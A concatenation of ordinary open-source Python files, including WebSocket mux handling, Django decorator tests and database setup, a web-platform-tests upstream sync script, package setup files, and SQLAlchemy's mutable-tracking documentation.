"""Called when a worker has finished.
Args:
            channel_id: channel id corresponding to the worker.
"""
self._logger.debug('Worker for channel id %d terminated' % channel_id)
try:
self._logical_channels_condition.acquire()
            if channel_id not in self._logical_channels:
raise MuxUnexpectedException(
'Channel id %d not found' % channel_id)
channel_data = self._logical_channels.pop(channel_id)
finally:
self._worker_done_notify_received = True
self._logical_channels_condition.notify()
self._logical_channels_condition.release()
if not channel_data.request.server_terminated:
self._send_drop_channel(
channel_id, code=channel_data.drop_code,
message=channel_data.drop_message)
def notify_reader_done(self):
"""This method is called by the reader thread when the reader has
finished.
"""
self._logger.debug(
            'Terminating all logical connections waiting for incoming data '
'...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def notify_writer_done(self):
"""This method is called by the writer thread when the writer has
finished.
"""
self._logger.debug(
            'Terminating all logical connections waiting for write '
'completion ...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.on_writer_done()
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def fail_physical_connection(self, code, message):
"""Fail the physical connection.
Args:
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing the physical connection...')
self._send_drop_channel(_CONTROL_CHANNEL_ID, code, message)
self._writer.stop(common.STATUS_INTERNAL_ENDPOINT_ERROR)
def fail_logical_channel(self, channel_id, code, message):
"""Fail a logical channel.
Args:
channel_id: channel id.
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing logical channel %d...' % channel_id)
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
# Close the logical channel. notify_worker_done() will be
# called later and it will send DropChannel.
channel_data.drop_code = code
channel_data.drop_message = message
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
else:
self._send_drop_channel(channel_id, code, message)
finally:
self._logical_channels_condition.release()
def use_mux(request):
return hasattr(request, 'mux_processor') and (
request.mux_processor.is_active())
def start(request, dispatcher):
mux_handler = _MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(_INITIAL_NUMBER_OF_CHANNEL_SLOTS,
_INITIAL_QUOTA_FOR_CLIENT)
mux_handler.wait_until_done()
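# A minimal usage sketch (added for illustration; not part of the original
# module): a handshake handler that has negotiated the mux extension can
# hand the physical connection over to this module like so.
#
#   if use_mux(request):
#       start(request, dispatcher)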
# vi:sts=4 sw=4 et
|
wagnerand/olympia | refs/heads/master | src/olympia/amo/tests/test_decorators.py | 4 | from datetime import datetime, timedelta
from django import http
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.test import RequestFactory
import mock
import pytest
from olympia import amo
from olympia.amo import decorators
from olympia.amo.tests import BaseTestCase, TestCase, fxa_login_link
from olympia.users.models import UserProfile
pytestmark = pytest.mark.django_db
def test_post_required():
def func(request):
return mock.sentinel.response
g = decorators.post_required(func)
request = mock.Mock()
request.method = 'GET'
assert isinstance(g(request), http.HttpResponseNotAllowed)
request.method = 'POST'
assert g(request) == mock.sentinel.response
def test_json_view():
"""Turns a Python object into a response."""
def func(request):
return {'x': 1}
response = decorators.json_view(func)(mock.Mock())
assert isinstance(response, http.HttpResponse)
assert response.content == '{"x": 1}'
assert response['Content-Type'] == 'application/json'
assert response.status_code == 200
def test_json_view_normal_response():
"""Normal responses get passed through."""
expected = http.HttpResponseForbidden()
def func(request):
return expected
response = decorators.json_view(func)(mock.Mock())
assert expected is response
assert response['Content-Type'] == 'text/html; charset=utf-8'
def test_json_view_error():
"""json_view.error returns 400 responses."""
response = decorators.json_view.error({'msg': 'error'})
assert isinstance(response, http.HttpResponseBadRequest)
assert response.content == '{"msg": "error"}'
assert response['Content-Type'] == 'application/json'
def test_json_view_status():
def func(request):
return {'x': 1}
response = decorators.json_view(func, status_code=202)(mock.Mock())
assert response.status_code == 202
def test_json_view_response_status():
response = decorators.json_response({'msg': 'error'}, status_code=202)
assert response.content == '{"msg": "error"}'
assert response['Content-Type'] == 'application/json'
assert response.status_code == 202
class TestLoginRequired(BaseTestCase):
def setUp(self):
super(TestLoginRequired, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = RequestFactory().get('/path')
self.request.user = AnonymousUser()
self.request.session = {}
def test_normal(self):
func = decorators.login_required(self.f)
response = func(self.request)
assert not self.f.called
assert response.status_code == 302
assert response['Location'] == fxa_login_link(
request=self.request, to='/path')
def test_no_redirect(self):
func = decorators.login_required(self.f, redirect=False)
response = func(self.request)
assert not self.f.called
assert response.status_code == 401
def test_decorator_syntax(self):
# @login_required(redirect=False)
func = decorators.login_required(redirect=False)(self.f)
response = func(self.request)
assert not self.f.called
assert response.status_code == 401
def test_no_redirect_success(self):
func = decorators.login_required(redirect=False)(self.f)
self.request.user = UserProfile()
func(self.request)
assert self.f.called
class TestSetModifiedOn(TestCase):
fixtures = ['base/users']
@decorators.set_modified_on
def some_method(self, worked):
return worked
def test_set_modified_on(self):
user = UserProfile.objects.latest('pk')
self.some_method(
True, set_modified_on=user.serializable_reference())
assert UserProfile.objects.get(pk=user.pk).modified.date() == (
datetime.today().date())
def test_not_set_modified_on(self):
yesterday = datetime.today() - timedelta(days=1)
qs = UserProfile.objects.all()
qs.update(modified=yesterday)
user = qs.latest('pk')
self.some_method(
False, set_modified_on=user.serializable_reference())
date = UserProfile.objects.get(pk=user.pk).modified.date()
assert date < datetime.today().date()
class TestPermissionRequired(TestCase):
empty_permission = amo.permissions.NONE
def setUp(self):
super(TestPermissionRequired, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = mock.Mock()
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_not_allowed(self, action_allowed):
action_allowed.return_value = False
func = decorators.permission_required(self.empty_permission)(self.f)
with self.assertRaises(PermissionDenied):
func(self.request)
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_allowed(self, action_allowed):
action_allowed.return_value = True
func = decorators.permission_required(self.empty_permission)(self.f)
func(self.request)
assert self.f.called
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_allowed_correctly(self, action_allowed):
func = decorators.permission_required(
amo.permissions.ANY_ADMIN)(self.f)
func(self.request)
action_allowed.assert_called_with(
self.request, amo.permissions.AclPermission('Admin', '%'))
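# A minimal sketch (hypothetical view; not part of the test suite) showing
# how the decorators exercised above are typically stacked:
#
#   @decorators.login_required(redirect=False)
#   @decorators.json_view
#   def my_view(request):
#       return {'ok': True}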
|
pwoodworth/intellij-community | refs/heads/master | python/lib/Lib/site-packages/django/db/__init__.py | 94 | from django.conf import settings
from django.core import signals
from django.core.exceptions import ImproperlyConfigured
from django.db.utils import ConnectionHandler, ConnectionRouter, load_backend, DEFAULT_DB_ALIAS, \
DatabaseError, IntegrityError
from django.utils.functional import curry
__all__ = ('backend', 'connection', 'connections', 'router', 'DatabaseError',
'IntegrityError', 'DEFAULT_DB_ALIAS')
# For backwards compatibility - Port any old database settings over to
# the new values.
if not settings.DATABASES:
import warnings
warnings.warn(
"settings.DATABASE_* is deprecated; use settings.DATABASES instead.",
DeprecationWarning
)
settings.DATABASES[DEFAULT_DB_ALIAS] = {
'ENGINE': settings.DATABASE_ENGINE,
'HOST': settings.DATABASE_HOST,
'NAME': settings.DATABASE_NAME,
'OPTIONS': settings.DATABASE_OPTIONS,
'PASSWORD': settings.DATABASE_PASSWORD,
'PORT': settings.DATABASE_PORT,
'USER': settings.DATABASE_USER,
'TEST_CHARSET': settings.TEST_DATABASE_CHARSET,
'TEST_COLLATION': settings.TEST_DATABASE_COLLATION,
'TEST_NAME': settings.TEST_DATABASE_NAME,
}
if DEFAULT_DB_ALIAS not in settings.DATABASES:
raise ImproperlyConfigured("You must define a '%s' database" % DEFAULT_DB_ALIAS)
for alias, database in settings.DATABASES.items():
if 'ENGINE' not in database:
raise ImproperlyConfigured("You must specify a 'ENGINE' for database '%s'" % alias)
if database['ENGINE'] in ("postgresql", "postgresql_psycopg2", "sqlite3", "mysql", "oracle"):
import warnings
if 'django.contrib.gis' in settings.INSTALLED_APPS:
warnings.warn(
"django.contrib.gis is now implemented as a full database backend. "
"Modify ENGINE in the %s database configuration to select "
"a backend from 'django.contrib.gis.db.backends'" % alias,
DeprecationWarning
)
if database['ENGINE'] == 'postgresql_psycopg2':
full_engine = 'django.contrib.gis.db.backends.postgis'
elif database['ENGINE'] == 'sqlite3':
full_engine = 'django.contrib.gis.db.backends.spatialite'
else:
full_engine = 'django.contrib.gis.db.backends.%s' % database['ENGINE']
else:
warnings.warn(
"Short names for ENGINE in database configurations are deprecated. "
"Prepend %s.ENGINE with 'django.db.backends.'" % alias,
DeprecationWarning
)
full_engine = "django.db.backends.%s" % database['ENGINE']
database['ENGINE'] = full_engine
connections = ConnectionHandler(settings.DATABASES)
router = ConnectionRouter(settings.DATABASE_ROUTERS)
# `connection`, `DatabaseError` and `IntegrityError` are convenient aliases
# for backend bits.
# DatabaseWrapper.__init__() takes a dictionary, not a settings module, so
# we manually create the dictionary from the settings, passing only the
# settings that the database backends care about. Note that TIME_ZONE is used
# by the PostgreSQL backends.
# we load all these up for backwards compatibility, you should use
# connections['default'] instead.
connection = connections[DEFAULT_DB_ALIAS]
backend = load_backend(connection.settings_dict['ENGINE'])
# Register an event that closes the database connection
# when a Django request is finished.
def close_connection(**kwargs):
for conn in connections.all():
conn.close()
signals.request_finished.connect(close_connection)
# Register an event that resets connection.queries
# when a Django request is started.
def reset_queries(**kwargs):
for conn in connections.all():
conn.queries = []
signals.request_started.connect(reset_queries)
# Register an event that rolls back the connections
# when a Django request has an exception.
def _rollback_on_exception(**kwargs):
from django.db import transaction
for conn in connections:
try:
transaction.rollback_unless_managed(using=conn)
except DatabaseError:
pass
signals.got_request_exception.connect(_rollback_on_exception)
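# A minimal usage sketch (added for illustration; not part of the original
# module), assuming a hypothetical second alias named 'replica' is
# configured in settings.DATABASES:
#
#   from django.db import connections
#   cursor = connections['replica'].cursor()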
|
mosdef-hub/mbuild | refs/heads/master | mbuild/lib/molecules/__init__.py | 2 | """Library of molecules for mBuild."""
from mbuild.lib.molecules.ethane import Ethane
from mbuild.lib.molecules.methane import Methane
from mbuild.lib.molecules.water import (
WaterSPC,
WaterTIP3P,
WaterTIP4P,
WaterTIP4P2005,
WaterTIP4PIce,
)
|
lnls-dig/malamute | refs/heads/master | bindings/python/setup.py | 4 | ################################################################################
# THIS FILE IS 100% GENERATED BY ZPROJECT; DO NOT EDIT EXCEPT EXPERIMENTALLY #
# Read the zproject/README.md for information about making permanent changes. #
################################################################################
from setuptools import setup
setup(
name = "malamute",
version = "1.1.0",
license = "mpl-2.0",
description = """Python bindings of: zeromq message broker""",
url = "https://github.com/zeromq/malamute",
packages = ["malamute"],
install_requires = [
"czmq",
],
)
################################################################################
# THIS FILE IS 100% GENERATED BY ZPROJECT; DO NOT EDIT EXCEPT EXPERIMENTALLY #
# Read the zproject/README.md for information about making permanent changes. #
################################################################################
|
wartman4404/servo | refs/heads/master | tests/wpt/update/upstream.py | 43 | import os
import re
import subprocess
import sys
import urlparse
from wptrunner.update.sync import LoadManifest
from wptrunner.update.tree import get_unique_name
from wptrunner.update.base import Step, StepRunner, exit_clean, exit_unclean
from .tree import Commit, GitTree, Patch
import github
from .github import GitHub
def rewrite_patch(patch, strip_dir):
"""Take a Patch and convert to a different repository by stripping a prefix from the
file paths. Also rewrite the message to remove the bug number and reviewer, but add
a bugzilla link in the summary.
:param patch: the Patch to convert
:param strip_dir: the path prefix to remove
"""
if not strip_dir.startswith("/"):
strip_dir = "/%s"% strip_dir
new_diff = []
line_starts = ["diff ", "+++ ", "--- "]
for line in patch.diff.split("\n"):
for start in line_starts:
if line.startswith(start):
new_diff.append(line.replace(strip_dir, "").encode("utf8"))
break
else:
new_diff.append(line)
new_diff = "\n".join(new_diff)
    assert new_diff != patch.diff
return Patch(patch.author, patch.email, rewrite_message(patch), new_diff)
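# A short sketch (hypothetical path; not part of the original module):
# MovePatches below calls rewrite_patch() with the repository-relative
# prefix of the in-tree tests directory, e.g.
#
#   upstream_patch = rewrite_patch(patch, "testing/web-platform/tests")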
def rewrite_message(patch):
rest = patch.message.body
if patch.message.bug is not None:
return "\n".join([patch.message.summary,
patch.message.body,
"",
"Upstreamed from https://bugzilla.mozilla.org/show_bug.cgi?id=%s" %
patch.message.bug])
return "\n".join([patch.message.full_summary, rest])
class SyncToUpstream(Step):
"""Sync local changes to upstream"""
def create(self, state):
if not state.kwargs["upstream"]:
return
if not isinstance(state.local_tree, GitTree):
self.logger.error("Cannot sync with upstream from a non-Git checkout.")
return exit_clean
try:
import requests
except ImportError:
self.logger.error("Upstream sync requires the requests module to be installed")
return exit_clean
if not state.sync_tree:
os.makedirs(state.sync["path"])
state.sync_tree = GitTree(root=state.sync["path"])
kwargs = state.kwargs
with state.push(["local_tree", "sync_tree", "tests_path", "metadata_path",
"sync"]):
state.token = kwargs["token"]
runner = SyncToUpstreamRunner(self.logger, state)
runner.run()
class CheckoutBranch(Step):
"""Create a branch in the sync tree pointing at the last upstream sync commit
and check it out"""
provides = ["branch"]
def create(self, state):
self.logger.info("Updating sync tree from %s" % state.sync["remote_url"])
state.branch = state.sync_tree.unique_branch_name(
"outbound_update_%s" % state.test_manifest.rev)
state.sync_tree.update(state.sync["remote_url"],
state.sync["branch"],
state.branch)
state.sync_tree.checkout(state.test_manifest.rev, state.branch, force=True)
class GetLastSyncCommit(Step):
"""Find the gecko commit at which we last performed a sync with upstream."""
provides = ["last_sync_path", "last_sync_commit"]
def create(self, state):
self.logger.info("Looking for last sync commit")
state.last_sync_path = os.path.join(state.metadata_path, "mozilla-sync")
with open(state.last_sync_path) as f:
last_sync_sha1 = f.read().strip()
state.last_sync_commit = Commit(state.local_tree, last_sync_sha1)
if not state.local_tree.contains_commit(state.last_sync_commit):
self.logger.error("Could not find last sync commit %s" % last_sync_sha1)
return exit_clean
self.logger.info("Last sync to web-platform-tests happened in %s" % state.last_sync_commit.sha1)
class GetBaseCommit(Step):
"""Find the latest upstream commit on the branch that we are syncing with"""
provides = ["base_commit"]
def create(self, state):
state.base_commit = state.sync_tree.get_remote_sha1(state.sync["remote_url"],
state.sync["branch"])
self.logger.debug("New base commit is %s" % state.base_commit.sha1)
class LoadCommits(Step):
"""Get a list of commits in the gecko tree that need to be upstreamed"""
provides = ["source_commits"]
def create(self, state):
state.source_commits = state.local_tree.log(state.last_sync_commit,
state.tests_path)
update_regexp = re.compile("Bug \d+ - Update web-platform-tests to revision [0-9a-f]{40}")
for i, commit in enumerate(state.source_commits[:]):
if update_regexp.match(commit.message.text):
# This is a previous update commit so ignore it
state.source_commits.remove(commit)
continue
if commit.message.backouts:
#TODO: Add support for collapsing backouts
raise NotImplementedError("Need to get the Git->Hg commits for backouts and remove the backed out patch")
if not commit.message.bug:
self.logger.error("Commit %i (%s) doesn't have an associated bug number." %
(i + 1, commit.sha1))
return exit_unclean
self.logger.debug("Source commits: %s" % state.source_commits)
class SelectCommits(Step):
"""Provide a UI to select which commits to upstream"""
def create(self, state):
if not state.source_commits:
return
while True:
commits = state.source_commits[:]
for i, commit in enumerate(commits):
print "%i:\t%s" % (i, commit.message.summary)
            remove = raw_input("Provide a space-separated list of any commit numbers to remove from the list to upstream:\n").strip()
remove_idx = set()
invalid = False
for item in remove.split(" "):
try:
item = int(item)
                except ValueError:
invalid = True
break
if item < 0 or item >= len(commits):
invalid = True
break
remove_idx.add(item)
if invalid:
continue
            keep_commits = [(i, cmt) for i, cmt in enumerate(commits) if i not in remove_idx]
            #TODO: consider printing removed commits
print "Selected the following commits to keep:"
for i, commit in keep_commits:
print "%i:\t%s" % (i, commit.message.summary)
confirm = raw_input("Keep the above commits? y/n\n").strip().lower()
if confirm == "y":
state.source_commits = [item[1] for item in keep_commits]
break
class MovePatches(Step):
"""Convert gecko commits into patches against upstream and commit these to the sync tree."""
provides = ["commits_loaded"]
def create(self, state):
state.commits_loaded = 0
strip_path = os.path.relpath(state.tests_path,
state.local_tree.root)
self.logger.debug("Stripping patch %s" % strip_path)
for commit in state.source_commits[state.commits_loaded:]:
i = state.commits_loaded + 1
self.logger.info("Moving commit %i: %s" % (i, commit.message.full_summary))
patch = commit.export_patch(state.tests_path)
stripped_patch = rewrite_patch(patch, strip_path)
try:
state.sync_tree.import_patch(stripped_patch)
except:
print patch.diff
raise
state.commits_loaded = i
class RebaseCommits(Step):
"""Rebase commits from the current branch on top of the upstream destination branch.
This step is particularly likely to fail if the rebase generates merge conflicts.
In that case the conflicts can be fixed up locally and the sync process restarted
with --continue.
"""
provides = ["rebased_commits"]
def create(self, state):
self.logger.info("Rebasing local commits")
continue_rebase = False
# Check if there's a rebase in progress
if (os.path.exists(os.path.join(state.sync_tree.root,
".git",
"rebase-merge")) or
os.path.exists(os.path.join(state.sync_tree.root,
".git",
"rebase-apply"))):
continue_rebase = True
try:
state.sync_tree.rebase(state.base_commit, continue_rebase=continue_rebase)
except subprocess.CalledProcessError:
self.logger.info("Rebase failed, fix merge and run %s again with --continue" % sys.argv[0])
raise
state.rebased_commits = state.sync_tree.log(state.base_commit)
self.logger.info("Rebase successful")
class CheckRebase(Step):
"""Check if there are any commits remaining after rebase"""
def create(self, state):
if not state.rebased_commits:
self.logger.info("Nothing to upstream, exiting")
return exit_clean
class MergeUpstream(Step):
"""Run steps to push local commits as seperate PRs and merge upstream."""
provides = ["merge_index", "gh_repo"]
def create(self, state):
gh = GitHub(state.token)
if "merge_index" not in state:
state.merge_index = 0
org, name = urlparse.urlsplit(state.sync["remote_url"]).path[1:].split("/")
if name.endswith(".git"):
name = name[:-4]
state.gh_repo = gh.repo(org, name)
for commit in state.rebased_commits[state.merge_index:]:
with state.push(["gh_repo", "sync_tree"]):
state.commit = commit
pr_merger = PRMergeRunner(self.logger, state)
rv = pr_merger.run()
if rv is not None:
return rv
state.merge_index += 1
class UpdateLastSyncCommit(Step):
"""Update the gecko commit at which we last performed a sync with upstream."""
provides = []
def create(self, state):
self.logger.info("Updating last sync commit")
with open(state.last_sync_path, "w") as f:
f.write(state.local_tree.rev)
# This gets added to the patch later on
class MergeLocalBranch(Step):
"""Create a local branch pointing at the commit to upstream"""
provides = ["local_branch"]
def create(self, state):
branch_prefix = "sync_%s" % state.commit.sha1
local_branch = state.sync_tree.unique_branch_name(branch_prefix)
state.sync_tree.create_branch(local_branch, state.commit)
state.local_branch = local_branch
class MergeRemoteBranch(Step):
"""Get an unused remote branch name to use for the PR"""
provides = ["remote_branch"]
def create(self, state):
remote_branch = "sync_%s" % state.commit.sha1
branches = [ref[len("refs/heads/"):] for sha1, ref in
state.sync_tree.list_remote(state.gh_repo.url)
if ref.startswith("refs/heads")]
state.remote_branch = get_unique_name(branches, remote_branch)
class PushUpstream(Step):
"""Push local branch to remote"""
def create(self, state):
self.logger.info("Pushing commit upstream")
state.sync_tree.push(state.gh_repo.url,
state.local_branch,
state.remote_branch)
class CreatePR(Step):
"""Create a PR for the remote branch"""
provides = ["pr"]
def create(self, state):
self.logger.info("Creating a PR")
commit = state.commit
state.pr = state.gh_repo.create_pr(commit.message.full_summary,
state.remote_branch,
"master",
commit.message.body if commit.message.body else "")
class PRAddComment(Step):
"""Add an issue comment indicating that the code has been reviewed already"""
def create(self, state):
state.pr.issue.add_comment("Code reviewed upstream.")
class MergePR(Step):
"""Merge the PR"""
def create(self, state):
self.logger.info("Merging PR")
state.pr.merge()
class PRDeleteBranch(Step):
"""Delete the remote branch"""
def create(self, state):
self.logger.info("Deleting remote branch")
state.sync_tree.push(state.gh_repo.url, "", state.remote_branch)
class SyncToUpstreamRunner(StepRunner):
"""Runner for syncing local changes to upstream"""
steps = [LoadManifest,
CheckoutBranch,
GetLastSyncCommit,
GetBaseCommit,
LoadCommits,
SelectCommits,
MovePatches,
RebaseCommits,
CheckRebase,
MergeUpstream,
UpdateLastSyncCommit]
class PRMergeRunner(StepRunner):
"""(Sub)Runner for creating and merging a PR"""
steps = [
MergeLocalBranch,
MergeRemoteBranch,
PushUpstream,
CreatePR,
PRAddComment,
MergePR,
PRDeleteBranch,
]
|
petewarden/tensorflow | refs/heads/master | tensorflow/python/kernel_tests/bias_op_test.py | 20 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for BiasAdd."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.kernel_tests import bias_op_base
from tensorflow.python.platform import test
BiasAddTest = bias_op_base.BiasAddTestBase
if __name__ == "__main__":
test.main()
|
xuru/restler | refs/heads/master | lib/usr/sqlalchemy/ext/mutable.py | 2 | # ext/mutable.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Provide support for tracking of in-place changes to scalar values,
which are propagated into ORM change events on owning parent objects.
The :mod:`sqlalchemy.ext.mutable` extension replaces SQLAlchemy's legacy approach to in-place
mutations of scalar values, established by the :class:`.types.MutableType`
class as well as the ``mutable=True`` type flag, with a system that allows
change events to be propagated from the value to the owning parent, thereby
removing the need for the ORM to maintain copies of values as well as the very
expensive requirement of scanning through all "mutable" values on each flush
call, looking for changes.
.. _mutable_scalars:
Establishing Mutability on Scalar Column Values
===============================================
A typical example of a "mutable" structure is a Python dictionary.
Following the example introduced in :ref:`types_toplevel`, we
begin with a custom type that marshals Python dictionaries into
JSON strings before being persisted::
from sqlalchemy.types import TypeDecorator, VARCHAR
import json
class JSONEncodedDict(TypeDecorator):
"Represents an immutable structure as a json-encoded string."
impl = VARCHAR
def process_bind_param(self, value, dialect):
if value is not None:
value = json.dumps(value)
return value
def process_result_value(self, value, dialect):
if value is not None:
value = json.loads(value)
return value
The usage of ``json`` is only for the purposes of example. The :mod:`sqlalchemy.ext.mutable`
extension can be used
with any type whose target Python type may be mutable, including
:class:`.PickleType`, :class:`.postgresql.ARRAY`, etc.
When using the :mod:`sqlalchemy.ext.mutable` extension, the value itself
tracks all parents which reference it. Here we will replace the usage
of plain Python dictionaries with a dict subclass that implements
the :class:`.Mutable` mixin::
import collections
from sqlalchemy.ext.mutable import Mutable
class MutationDict(Mutable, dict):
@classmethod
def coerce(cls, key, value):
"Convert plain dictionaries to MutationDict."
if not isinstance(value, MutationDict):
if isinstance(value, dict):
return MutationDict(value)
# this call will raise ValueError
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
"Detect dictionary set events and emit change events."
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
"Detect dictionary del events and emit change events."
dict.__delitem__(self, key)
self.changed()
The above dictionary class takes the approach of subclassing the Python
built-in ``dict`` to produce a dict
subclass which routes all mutation events through ``__setitem__``. There are
many variants on this approach, such as subclassing ``UserDict.UserDict``,
the newer ``collections.MutableMapping``, etc. The part that's important to this
example is that the :meth:`.Mutable.changed` method is called whenever an in-place change to the
datastructure takes place.
We also redefine the :meth:`.Mutable.coerce` method which will be used to
convert any values that are not instances of ``MutationDict``, such
as the plain dictionaries returned by the ``json`` module, into the
appropriate type. Defining this method is optional; we could just as well have created our
``JSONEncodedDict`` such that it always returns an instance of ``MutationDict``,
and additionally ensured that all calling code uses ``MutationDict``
explicitly. When :meth:`.Mutable.coerce` is not overridden, any values
applied to a parent object which are not instances of the mutable type
will raise a ``ValueError``.
Our new ``MutationDict`` type offers a class method
:meth:`~.Mutable.as_mutable` which we can use within column metadata
to associate with types. This method grabs the given type object or
class and associates a listener that will detect all future mappings
of this type, applying event listening instrumentation to the mapped
attribute. For example, with classical table metadata::
from sqlalchemy import Table, Column, Integer
my_data = Table('my_data', metadata,
Column('id', Integer, primary_key=True),
Column('data', MutationDict.as_mutable(JSONEncodedDict))
)
Above, :meth:`~.Mutable.as_mutable` returns an instance of ``JSONEncodedDict``
(if the type object was not an instance already), which will intercept any
attributes which are mapped against this type. Below we establish a simple
mapping against the ``my_data`` table::
from sqlalchemy import mapper
class MyDataClass(object):
pass
# associates mutation listeners with MyDataClass.data
mapper(MyDataClass, my_data)
The ``MyDataClass.data`` member will now be notified of in place changes
to its value.
There's no difference in usage when using declarative::
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class MyDataClass(Base):
__tablename__ = 'my_data'
id = Column(Integer, primary_key=True)
data = Column(MutationDict.as_mutable(JSONEncodedDict))
Any in-place changes to the ``MyDataClass.data`` member
will flag the attribute as "dirty" on the parent object::
>>> from sqlalchemy.orm import Session
>>> sess = Session()
>>> m1 = MyDataClass(data={'value1':'foo'})
>>> sess.add(m1)
>>> sess.commit()
>>> m1.data['value1'] = 'bar'
>>> assert m1 in sess.dirty
True
The ``MutationDict`` can be associated with all future instances
of ``JSONEncodedDict`` in one step, using :meth:`~.Mutable.associate_with`. This
is similar to :meth:`~.Mutable.as_mutable` except it will intercept
all occurrences of ``MutationDict`` in all mappings unconditionally, without
the need to declare it individually::
MutationDict.associate_with(JSONEncodedDict)
class MyDataClass(Base):
__tablename__ = 'my_data'
id = Column(Integer, primary_key=True)
data = Column(JSONEncodedDict)
Supporting Pickling
--------------------
The key to the :mod:`sqlalchemy.ext.mutable` extension relies upon the
placement of a ``weakref.WeakKeyDictionary`` upon the value object, which
stores a mapping of parent mapped objects keyed to the attribute name under
which they are associated with this value. ``WeakKeyDictionary`` objects are
not picklable, due to the fact that they contain weakrefs and function
callbacks. In our case, this is a good thing, since if this dictionary were
picklable, it could lead to an excessively large pickle size for our value
objects that are pickled by themselves outside of the context of the parent.
The developer responsibility here is only to provide a ``__getstate__`` method
that excludes the :meth:`~.MutableBase._parents` collection from the pickle
stream::
class MyMutableType(Mutable):
def __getstate__(self):
d = self.__dict__.copy()
d.pop('_parents', None)
return d
With our dictionary example, we need to return the contents of the dict itself
(and also restore them on __setstate__)::
class MutationDict(Mutable, dict):
# ....
def __getstate__(self):
return dict(self)
def __setstate__(self, state):
self.update(state)
In the case that our mutable value object is pickled as it is attached to one
or more parent objects that are also part of the pickle, the :class:`.Mutable`
mixin will re-establish the :attr:`.Mutable._parents` collection on each value
object as the owning parents themselves are unpickled.
.. _mutable_composites:
Establishing Mutability on Composites
=====================================
Composites are a special ORM feature which allow a single scalar attribute to
be assigned an object value which represents information "composed" from one
or more columns from the underlying mapped table. The usual example is that of
a geometric "point", and is introduced in :ref:`mapper_composite`.
.. versionchanged:: 0.7
The internals of :func:`.orm.composite` have been
greatly simplified and in-place mutation detection is no longer enabled by
default; instead, the user-defined value must detect changes on its own and
propagate them to all owning parents. The :mod:`sqlalchemy.ext.mutable`
extension provides the helper class :class:`.MutableComposite`, which is a
slight variant on the :class:`.Mutable` class.
As is the case with :class:`.Mutable`, the user-defined composite class
subclasses :class:`.MutableComposite` as a mixin, and detects and delivers
change events to its parents via the :meth:`.MutableComposite.changed` method.
In the case of a composite class, the detection is usually via the usage of
Python descriptors (i.e. ``@property``), or alternatively via the special
Python method ``__setattr__()``. Below we expand upon the ``Point`` class
introduced in :ref:`mapper_composite` to subclass :class:`.MutableComposite`
and to also route attribute set events via ``__setattr__`` to the
:meth:`.MutableComposite.changed` method::
from sqlalchemy.ext.mutable import MutableComposite
class Point(MutableComposite):
def __init__(self, x, y):
self.x = x
self.y = y
def __setattr__(self, key, value):
"Intercept set events"
# set the attribute
object.__setattr__(self, key, value)
# alert all parents to the change
self.changed()
def __composite_values__(self):
return self.x, self.y
def __eq__(self, other):
return isinstance(other, Point) and \\
other.x == self.x and \\
other.y == self.y
def __ne__(self, other):
return not self.__eq__(other)
The :class:`.MutableComposite` class uses a Python metaclass to automatically
establish listeners for any usage of :func:`.orm.composite` that specifies our
``Point`` type. Below, when ``Point`` is mapped to the ``Vertex`` class,
listeners are established which will route change events from ``Point``
objects to each of the ``Vertex.start`` and ``Vertex.end`` attributes::
from sqlalchemy.orm import composite, mapper
from sqlalchemy import Table, Column
vertices = Table('vertices', metadata,
Column('id', Integer, primary_key=True),
Column('x1', Integer),
Column('y1', Integer),
Column('x2', Integer),
Column('y2', Integer),
)
class Vertex(object):
pass
mapper(Vertex, vertices, properties={
'start': composite(Point, vertices.c.x1, vertices.c.y1),
'end': composite(Point, vertices.c.x2, vertices.c.y2)
})
Any in-place changes to the ``Vertex.start`` or ``Vertex.end`` members
will flag the attribute as "dirty" on the parent object::
>>> from sqlalchemy.orm import Session
>>> sess = Session()
>>> v1 = Vertex(start=Point(3, 4), end=Point(12, 15))
>>> sess.add(v1)
>>> sess.commit()
>>> v1.end.x = 8
>>> assert v1 in sess.dirty
True
Supporting Pickling
--------------------
As is the case with :class:`.Mutable`, the :class:`.MutableComposite` helper
class uses a ``weakref.WeakKeyDictionary`` available via the
:meth:`.MutableBase._parents` attribute which isn't picklable. If we need to
pickle instances of ``Point`` or its owning class ``Vertex``, we at least need
to define a ``__getstate__`` that doesn't include the ``_parents`` dictionary.
Below we define both a ``__getstate__`` and a ``__setstate__`` that package up
the minimal form of our ``Point`` class::
class Point(MutableComposite):
# ...
def __getstate__(self):
return self.x, self.y
def __setstate__(self, state):
self.x, self.y = state
As with :class:`.Mutable`, the :class:`.MutableComposite` augments the
pickling process of the parent's object-relational state so that the
